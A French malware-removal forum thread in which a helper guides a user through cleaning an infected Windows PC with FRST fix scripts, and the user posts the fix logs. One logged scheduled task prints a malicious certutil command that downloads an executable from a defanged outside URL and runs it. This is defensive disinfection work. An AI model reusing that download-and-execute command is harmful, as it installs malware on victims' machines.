lenteur du pc, acceleration du ventilateur

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

Walter x
newbie
newbie
Messages : 14
Inscription : 19 mai 2018 12:44

lenteur du pc, acceleration du ventilateur

Message par Walter x » 15 juin 2019 16:39

bonjour, je viens par ce message solliciter votre aide. j'ai un petit souci avec mon ordinateur depuis quelques jours. il devient plus lent et le ventilateur tourne très vite. je compte sur vous merci.

https://pjjoint.malekal.com/files.php?i ... 15s6k13m14

https://pjjoint.malekal.com/files.php?i ... 1p11q107w7

https://pjjoint.malekal.com/files.php?i ... 9j7m7u7u12




Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 29311
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: lenteur du pc, acceleration du ventilateur

Message par angelique » 15 juin 2019 18:11

Bonjour/Bonsoir

De belles merdouilles, et de mémoire ne peuvent s'enlever que depuis un live cd car tu télécharges et exécute des cracks !!!
:
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-06-07] (WDKTestCert Admin,131666266076831434 -> ) [Fichier non signé]

et bien d'autres....

  • Télécharge à coté de FRST.EXE , PAS AILLEURS !!!!! le fichier fixlist.txt en pièce jointe en bas du message.

    Relance FRST(clic droit exécuter en tant qu'administrateur) et clic sur le bouton corriger/fix
    Un redémarrage peut être nécessaire (pas obligatoire).
    Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message avec ton commentaire.

    /!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows /!\

Puis ensuite tu refais 2 nouveaux rapports frst.txt et addition.txt
Pièces jointes
fixlist.txt
(9.14 Kio) Téléchargé 4 fois
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!Je fais parti des millions de pauvres en France
Image
https://lilymarguerite.wixsite.com/lilymarguerite

Walter x
newbie
newbie
Messages : 14
Inscription : 19 mai 2018 12:44

Re: lenteur du pc, acceleration du ventilateur

Message par Walter x » 15 juin 2019 21:19

rebonsoir merci pour votre aide. jusqu'à present, je ne remarque aucun changement. surtout quand je lance le wifi c'est catastrophique. je vous envoie le fixlog puis je mettrai les liens des deux autres nouveaux rapport.


Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 15-06-2019
Exécuté par bayen (15-06-2019 19:46:47) Run:1
Exécuté depuis C:\Users\bayen\Desktop
Profils chargés: bayen (Profils disponibles: bayen)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
HKU\S-1-5-21-3045448650-3500290857-1332656890-1001\...\Run: [Chromium] => c:\users\bayen\appdata\local\chromium\application\chrome.exe [4186112 2017-10-10] (The Chromium Authors) [Fichier non signé]
HKU\S-1-5-21-3045448650-3500290857-1332656890-1001\...\Run: [RedWave] => C:\Windows\rss\csrss.exe [5235712 2019-06-07] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-3045448650-3500290857-1332656890-1001\...\Run: [CloudNet] => C:\Users\bayen\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-06-12] (EpicNet Inc.) [Fichier non signé]
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
Task: {A8BF875A-1096-4DEF-B0B2-7B688EBEA081} - System32\Tasks\Sk12850Pl => C:\Users\bayen\AppData\Local\prunld848\he9724.exe
Task: {D68EDE59-5856-4D3C-A652-7B17F9A951EA} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5235712 2019-06-07] () [Fichier non signé] <==== ATTENTION
Task: {DCD7A88A-7744-4D81-A0DA-DA78BA98DA72} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://nevernews.club/app/app.exe C:\Users\bayen\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\bayen\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {449181E1-70AD-4FFD-8254-8BE699D7928C} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [199864 2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {58414D4C-E781-47C3-A352-B5953314E402} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [199864 2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {EDD21850-1C29-4117-94B3-E2A17CC8F6DA} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [199864 2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G4.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G5.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G6.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Accès refusé) <==== ATTENTION (Accès refusé)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-06-07] (WDKTestCert Admin,131666266076831434 -> ) [Fichier non signé]
S1 mcgelulx; \??\C:\Windows\system32\drivers\mcgelulx.sys [X]
2019-06-08 20:26 - 2019-06-08 20:26 - 000003278 _____ C:\Windows\System32\Tasks\Sk12850Pl
2019-06-08 20:25 - 2019-06-09 00:57 - 000000000 ____D C:\ProgramData\fb
2019-06-08 20:25 - 2019-06-08 20:46 - 000000000 ____D C:\Users\bayen\AppData\Local\Mail.Ru
2019-06-08 20:25 - 2019-06-08 20:46 - 000000000 ____D C:\Program Files (x86)\Mail.Ru
2019-06-08 20:25 - 2019-06-08 20:25 - 000000198 _____ C:\Users\bayen\Desktop\Искать в Интернете.url
2019-06-08 20:25 - 2019-06-08 20:25 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2019-06-08 20:25 - 2019-06-08 20:25 - 000000000 ____D C:\ProgramData\Mail.Ru
2019-06-07 22:20 - 2019-06-08 19:19 - 000000000 ____D C:\Users\bayen\AppData\Roaming\Fine
2019-06-07 22:20 - 2019-06-07 22:23 - 000000000 ____D C:\Users\bayen\AppData\Local\Fine
2019-06-07 22:20 - 2019-06-07 22:20 - 000000000 ____D C:\Users\bayen\AppData\Local\SafeNet Sentinel
2019-06-07 21:57 - 2019-06-07 21:59 - 000001295 _____ C:\Users\Public\Desktop\GEO5 2019 FR.lnk
2019-06-07 21:57 - 2019-06-07 21:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GEO5 2019 FR
2019-06-07 21:57 - 2019-06-07 21:57 - 000000000 ____D C:\Users\Public\Documents\Fine
2019-06-07 21:41 - 2019-06-07 21:57 - 000000000 ____D C:\Program Files (x86)\Fine
2019-06-07 21:09 - 2019-06-07 21:09 - 000000000 ____D C:\Users\bayen\AppData\Local\Tekla DataSharing
2019-06-07 21:09 - 2019-06-07 21:09 - 000000000 ____D C:\Users\bayen\AppData\Local\IsolatedStorage
2019-06-07 21:08 - 2019-06-07 21:08 - 000000000 ____D C:\Users\bayen\AppData\Roaming\EpicNet Inc
2019-06-07 21:07 - 2019-06-07 21:07 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-06-07 21:07 - 2019-06-07 21:07 - 000000000 ____D C:\Program Files (x86)\FastDataX
2019-06-07 21:06 - 2019-06-07 21:06 - 000000000 ____D C:\ProgramData\{F30144F4-6B40-D461-3876-E2583891BB09}
2019-06-07 21:06 - 2019-06-07 21:06 - 000000000 ____D C:\ProgramData\{73632287-0D33-5403-4B10-80D84BF7D989}
2019-06-07 21:05 - 2019-06-11 10:28 - 000003270 _____ C:\Windows\System32\Tasks\csrss
2019-06-07 21:05 - 2019-06-07 21:05 - 000003588 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2019-06-07 21:04 - 2019-06-08 00:12 - 000000000 ____D C:\Users\bayen\AppData\Roaming\m1k1pqdh03v
2019-06-07 21:04 - 2019-06-07 22:13 - 000000000 ____D C:\Program Files (x86)\Biic
2019-06-07 21:04 - 2019-06-07 21:09 - 000000000 ____D C:\Program Files\J0B6VTK4FH
2019-06-01 16:45 - 2019-06-01 16:45 - 000000000 ____D C:\Program Files (x86)\Seed Trade
2019-06-01 16:44 - 2019-06-07 21:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DreamTrips
2019-06-01 16:44 - 2019-06-07 21:06 - 000000000 ____D C:\Program Files (x86)\DreamTrips
2019-06-01 16:44 - 2019-06-01 17:14 - 000000000 ____D C:\Users\bayen\AppData\Roaming\g1otrt2dmnl
2019-06-01 16:44 - 2019-06-01 16:47 - 000000000 ____D C:\Program Files\32REIRGA94
2019-06-01 16:44 - 2019-06-01 16:45 - 000016896 _____ C:\Users\bayen\AppData\Local\InstallationConfiguration.xml
2019-06-01 16:44 - 2019-06-01 16:44 - 000722944 _____ C:\Users\bayen\AppData\Local\sha.db
2019-06-01 16:44 - 2019-06-01 16:44 - 000140800 _____ C:\Users\bayen\AppData\Local\installer.dat
2019-06-01 15:13 - 2019-06-01 17:14 - 000000414 _____ C:\Windows\Tasks\Updater_Online_Application.job
2019-06-01 15:13 - 2019-06-01 17:14 - 000000382 _____ C:\Windows\Tasks\Online Application V2G6.job
2019-06-01 15:13 - 2019-06-01 17:14 - 000000382 _____ C:\Windows\Tasks\Online Application V2G5.job
2019-06-01 15:13 - 2019-06-01 17:14 - 000000382 _____ C:\Windows\Tasks\Online Application V2G4.job
2019-06-01 15:13 - 2019-06-01 17:14 - 000000382 _____ C:\Windows\Tasks\Online Application V2G3.job
2019-06-01 15:13 - 2019-06-01 17:14 - 000000382 _____ C:\Windows\Tasks\Online Application V2G2.job
2019-06-01 15:13 - 2019-06-01 17:14 - 000000382 _____ C:\Windows\Tasks\Online Application V2G1.job
2019-06-01 15:13 - 2019-06-01 15:13 - 000003308 _____ C:\Windows\System32\Tasks\Updater_Online_Application
2019-06-01 15:13 - 2019-06-01 15:13 - 000003272 _____ C:\Windows\System32\Tasks\Online Application V2G6
2019-06-01 15:13 - 2019-06-01 15:13 - 000003272 _____ C:\Windows\System32\Tasks\Online Application V2G5
2019-06-01 15:13 - 2019-06-01 15:13 - 000003272 _____ C:\Windows\System32\Tasks\Online Application V2G4
2019-06-01 15:13 - 2019-06-01 15:13 - 000003272 _____ C:\Windows\System32\Tasks\Online Application V2G3
2019-06-01 15:13 - 2019-06-01 15:13 - 000003272 _____ C:\Windows\System32\Tasks\Online Application V2G2
2019-06-01 15:13 - 2019-06-01 15:13 - 000003272 _____ C:\Windows\System32\Tasks\Online Application V2G1
2019-06-01 15:13 - 2019-06-01 15:13 - 000000000 ____D C:\Program Files (x86)\Microleaves
2019-06-01 15:12 - 2019-06-01 15:12 - 000000000 ____D C:\Users\bayen\AppData\Roaming\Microleaves
2019-06-01 15:12 - 2019-06-01 15:12 - 000000000 ____D C:\Users\bayen\AppData\Local\AdvinstAnalytics
2019-06-01 14:49 - 2019-06-01 17:26 - 000000000 ____D C:\Users\bayen\AppData\Local\chromium
2019-06-01 14:47 - 2019-06-01 16:48 - 000000000 ____D C:\Users\bayen\AppData\Roaming\Cumagodato
2019-06-01 14:47 - 2019-06-01 14:47 - 000000000 ____D C:\ProgramData\{FC3DC001-D415-B879-8C4D-905164A54889}
2019-06-01 14:46 - 2019-06-01 14:50 - 000000000 ____D C:\ProgramData\maaim
2019-06-01 14:45 - 2019-06-01 14:45 - 002330224 _____ ( ) C:\Users\bayen\Downloads\microsoft_project_3206886063.exe
2019-06-01 14:35 - 2019-06-01 17:26 - 000000000 ____D C:\Program Files\KMSpico
2019-06-01 14:35 - 2019-06-01 14:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico
C:\Windows\rss
Hosts:
EmptyTemp:

*****************

Le Point de restauration a été créé avec succès.
"HKU\S-1-5-21-3045448650-3500290857-1332656890-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Chromium" => supprimé(es) avec succès
"HKU\S-1-5-21-3045448650-3500290857-1332656890-1001\Software\Microsoft\Windows\CurrentVersion\Run\\RedWave" => supprimé(es) avec succès
"HKU\S-1-5-21-3045448650-3500290857-1332656890-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => supprimé(es) avec succès
C:\Windows\system32\GroupPolicy\Machine => déplacé(es) avec succès
C:\Windows\system32\GroupPolicy\GPT.ini => déplacé(es) avec succès
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => déplacé(es) avec succès
C:\Windows\system32\GroupPolicy\User => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A8BF875A-1096-4DEF-B0B2-7B688EBEA081}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A8BF875A-1096-4DEF-B0B2-7B688EBEA081}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\Sk12850Pl => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Sk12850Pl" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D68EDE59-5856-4D3C-A652-7B17F9A951EA}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D68EDE59-5856-4D3C-A652-7B17F9A951EA}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\csrss => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DCD7A88A-7744-4D81-A0DA-DA78BA98DA72}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DCD7A88A-7744-4D81-A0DA-DA78BA98DA72}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{449181E1-70AD-4FFD-8254-8BE699D7928C}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{449181E1-70AD-4FFD-8254-8BE699D7928C}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\Online Application V2G3 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G3" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{58414D4C-E781-47C3-A352-B5953314E402}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{58414D4C-E781-47C3-A352-B5953314E402}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\Online Application V2G1 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G1" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EDD21850-1C29-4117-94B3-E2A17CC8F6DA}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EDD21850-1C29-4117-94B3-E2A17CC8F6DA}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\Online Application V2G2 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G2" => supprimé(es) avec succès
C:\Windows\Tasks\Online Application V2G1.job => déplacé(es) avec succès
C:\Windows\Tasks\Online Application V2G2.job => déplacé(es) avec succès
C:\Windows\Tasks\Online Application V2G3.job => déplacé(es) avec succès
C:\Windows\Tasks\Online Application V2G4.job => déplacé(es) avec succès
C:\Windows\Tasks\Online Application V2G5.job => déplacé(es) avec succès
C:\Windows\Tasks\Online Application V2G6.job => déplacé(es) avec succès
C:\Windows\Tasks\Updater_Online_Application.job => déplacé(es) avec succès
WinDefender => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WinDefender => supprimé(es) avec succès
WinDefender => service supprimé(es) avec succès
Winmon => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\Winmon => supprimé(es) avec succès
Winmon => service supprimé(es) avec succès
WinmonFS => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WinmonFS => supprimé(es) avec succès
WinmonFS => service supprimé(es) avec succès
WinmonProcessMonitor => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WinmonProcessMonitor => supprimé(es) avec succès
WinmonProcessMonitor => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\mcgelulx => supprimé(es) avec succès
mcgelulx => service supprimé(es) avec succès
"C:\Windows\System32\Tasks\Sk12850Pl" => non trouvé(e)
C:\ProgramData\fb => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\Mail.Ru => déplacé(es) avec succès
C:\Program Files (x86)\Mail.Ru => déplacé(es) avec succès
"C:\Users\bayen\Desktop\Искать в Интернете.url" => non trouvé(e)
C:\Users\Public\Documents\XMUpdate => déplacé(es) avec succès
C:\ProgramData\Mail.Ru => déplacé(es) avec succès
C:\Users\bayen\AppData\Roaming\Fine => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\Fine => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\SafeNet Sentinel => déplacé(es) avec succès
"C:\Users\Public\Desktop\GEO5 2019 FR.lnk" => non trouvé(e)
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GEO5 2019 FR" => non trouvé(e)
"C:\Users\Public\Documents\Fine" => non trouvé(e)
C:\Program Files (x86)\Fine => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\Tekla DataSharing => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\IsolatedStorage => déplacé(es) avec succès
C:\Users\bayen\AppData\Roaming\EpicNet Inc => déplacé(es) avec succès
C:\Windows\system32\Drivers\WinmonProcessMonitor.sys => déplacé(es) avec succès
C:\Program Files (x86)\FastDataX => déplacé(es) avec succès
C:\ProgramData\{F30144F4-6B40-D461-3876-E2583891BB09} => déplacé(es) avec succès
C:\ProgramData\{73632287-0D33-5403-4B10-80D84BF7D989} => déplacé(es) avec succès
"C:\Windows\System32\Tasks\csrss" => non trouvé(e)
"C:\Windows\System32\Tasks\ScheduledUpdate" => non trouvé(e)
C:\Users\bayen\AppData\Roaming\m1k1pqdh03v => déplacé(es) avec succès
C:\Program Files (x86)\Biic => déplacé(es) avec succès
C:\Program Files\J0B6VTK4FH => déplacé(es) avec succès
C:\Program Files (x86)\Seed Trade => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DreamTrips => déplacé(es) avec succès
C:\Program Files (x86)\DreamTrips => déplacé(es) avec succès
C:\Users\bayen\AppData\Roaming\g1otrt2dmnl => déplacé(es) avec succès
C:\Program Files\32REIRGA94 => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\InstallationConfiguration.xml => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\sha.db => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\installer.dat => déplacé(es) avec succès
"C:\Windows\Tasks\Updater_Online_Application.job" => non trouvé(e)
"C:\Windows\Tasks\Online Application V2G6.job" => non trouvé(e)
"C:\Windows\Tasks\Online Application V2G5.job" => non trouvé(e)
"C:\Windows\Tasks\Online Application V2G4.job" => non trouvé(e)
"C:\Windows\Tasks\Online Application V2G3.job" => non trouvé(e)
"C:\Windows\Tasks\Online Application V2G2.job" => non trouvé(e)
"C:\Windows\Tasks\Online Application V2G1.job" => non trouvé(e)
C:\Windows\System32\Tasks\Updater_Online_Application => déplacé(es) avec succès
C:\Windows\System32\Tasks\Online Application V2G6 => déplacé(es) avec succès
C:\Windows\System32\Tasks\Online Application V2G5 => déplacé(es) avec succès
C:\Windows\System32\Tasks\Online Application V2G4 => déplacé(es) avec succès
"C:\Windows\System32\Tasks\Online Application V2G3" => non trouvé(e)
"C:\Windows\System32\Tasks\Online Application V2G2" => non trouvé(e)
"C:\Windows\System32\Tasks\Online Application V2G1" => non trouvé(e)
C:\Program Files (x86)\Microleaves => déplacé(es) avec succès
C:\Users\bayen\AppData\Roaming\Microleaves => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\AdvinstAnalytics => déplacé(es) avec succès
C:\Users\bayen\AppData\Local\chromium => déplacé(es) avec succès
C:\Users\bayen\AppData\Roaming\Cumagodato => déplacé(es) avec succès
C:\ProgramData\{FC3DC001-D415-B879-8C4D-905164A54889} => déplacé(es) avec succès
C:\ProgramData\maaim => déplacé(es) avec succès
C:\Users\bayen\Downloads\microsoft_project_3206886063.exe => déplacé(es) avec succès
C:\Program Files\KMSpico => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico => déplacé(es) avec succès

"C:\Windows\rss" dossier déplacer:

Impossible de déplacer "C:\Windows\rss" => Planifié pour déplacement au redémarrage.

C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

=========== EmptyTemp: ==========

BITS transfer queue => 9461760 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 570076221 B
Java, Flash, Steam htmlcache => 1110 B
Windows/system/drivers => 921179 B
Edge => 36222427 B
Chrome => 11234294 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
LocalService => 0 B
NetworkService => 274188 B
NetworkService => 0 B
bayen => 133869652 B

RecycleBin => 111225338 B
EmptyTemp: => 832.8 MB données temporaires supprimées.

================================

Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 15-06-2019 19:57:12)

C:\Windows\rss => a été déplacé(e) avec succès

==== Fin de Fixlog 19:57:32 ====


https://pjjoint.malekal.com/files.php?i ... 5c14r12m13

https://pjjoint.malekal.com/files.php?i ... h10x9d85o5

Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 29311
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: lenteur du pc, acceleration du ventilateur

Message par angelique » 16 juin 2019 09:42

.Tes résolutions DNS sont hijackés, change les manuellement viewtopic.php?t=48312&start=

par celles comme sur les captures en bas



.Désinstalle via programmes et fonctionnalités si ça marche, sinon continue:

CloudNet

FastDataX 1.20

foldershare


Image Télécharge à coté de FRST.EXE , PAS AILLEURS !!!!! le fichier fixlist.txt en pièce jointe en bas du message.

➯ Relance FRST(clic droit exécuter en tant qu'administrateur) et clic sur le bouton corriger/fix
Un redémarrage peut être nécessaire (pas obligatoire).
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message avec ton commentaire.

/!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows /!\
Pièces jointes
start_13.gif
start_12.gif
fixlist.txt
(1.63 Kio) Téléchargé 1 fois
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!Je fais parti des millions de pauvres en France
Image
https://lilymarguerite.wixsite.com/lilymarguerite

Walter x
newbie
newbie
Messages : 14
Inscription : 19 mai 2018 12:44

Re: lenteur du pc, acceleration du ventilateur

Message par Walter x » 16 juin 2019 15:59

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 15-06-2019
Exécuté par bayen (16-06-2019 13:09:21) Run:2
Exécuté depuis C:\Users\bayen\Desktop
Profils chargés: bayen (Profils disponibles: bayen)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
Task: {5F2E96E2-E193-4CBD-9167-4A1D41E5DE19} - \Updater_Online_Application -> Pas de fichier <==== ATTENTION
Task: {7BB4953B-5E85-40A0-B34F-66F8332FC2C3} - \Online Application V2G4 -> Pas de fichier <==== ATTENTION
Task: {850B3FE8-5039-40E7-ACAF-B9BD46829501} - \Online Application V2G5 -> Pas de fichier <==== ATTENTION
Task: {9D758682-9B58-4BCD-936C-F21B754D3F64} - \Online Application V2G6 -> Pas de fichier <==== ATTENTION
2019-06-08 20:27 - 2019-06-08 20:27 - 000000000 ____D C:\Users\bayen\Documents\TigerTrade
2019-06-08 20:27 - 2019-06-08 20:27 - 000000000 ____D C:\Users\bayen\AppData\Roaming\TigerTrade
2019-06-08 20:26 - 2019-06-10 23:26 - 000000000 ____D C:\Users\bayen\AppData\Local\prunld848
2019-06-08 20:26 - 2019-06-09 01:24 - 000000000 ____D C:\Program Files (x86)\WeekJbos
2019-06-08 03:24 - 2019-06-08 03:24 - 000000000 ____D C:\Users\bayen\AppData\Local\Graitec
2019-06-07 21:07 - 2019-06-07 21:07 - 001435136 ____H C:\Windows\windefender.exe
2019-06-07 21:07 - 2019-06-07 21:07 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
2019-06-07 21:07 - 2019-06-07 21:07 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
REG: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastDataX_is1" /f
REG: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\foldershare" /f
REG: reg delete "HKU\S-1-5-21-3045448650-3500290857-1332656890-1001\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet" /f
EmptyTemp:


*****************

Le Point de restauration a été créé avec succès.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5F2E96E2-E193-4CBD-9167-4A1D41E5DE19}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5F2E96E2-E193-4CBD-9167-4A1D41E5DE19}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Updater_Online_Application" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7BB4953B-5E85-40A0-B34F-66F8332FC2C3}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BB4953B-5E85-40A0-B34F-66F8332FC2C3}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G4" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{850B3FE8-5039-40E7-ACAF-B9BD46829501}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{850B3FE8-5039-40E7-ACAF-B9BD46829501}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G5" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9D758682-9B58-4BCD-936C-F21B754D3F64}" => supprimé(es) avec succès
